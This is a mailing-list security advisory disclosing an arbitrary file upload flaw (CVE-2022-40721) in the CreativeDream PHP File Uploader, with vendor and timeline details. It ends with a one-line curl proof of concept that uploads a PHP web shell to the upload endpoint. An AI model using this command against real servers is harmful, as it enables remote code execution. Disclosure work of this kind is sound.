oss-sec mailing list archives
CreativeDream software arbitrary file upload
From: Larry Cashdollar <larry0 () me com>
Date: Mon, 3 Oct 2022 12:17:43 -0400
Title: CreativeDream software arbitrary file upload Author: Larry W. Cashdollar Date: 2022-09-08 CVE-ID:[CVE-2022-40721] Download Site: https://github.com/CreativeDream Vendor: CreativeDream Vendor Notified: 2020-02-19 Vendor Contact: yuliangagarin [at] mail.ru References: https://github.com/CreativeDream/php-uploader/issues/23 Advisory: http://www.vapidlabs.com/advisory.php?v=216 Description: PHP File Uploader is an easy to use, hi-performance File Upload Script which allows you to upload/download files to webserver. Vulnerability: The software allows executable file uploads to the web root directory. Export: JSON TEXT XML Exploit Code: • curl -vk http://localhost/php-uploader/examples/upload.php -F "files=@shell.php"
Current thread:
- CreativeDream software arbitrary file upload Larry Cashdollar (Oct 03)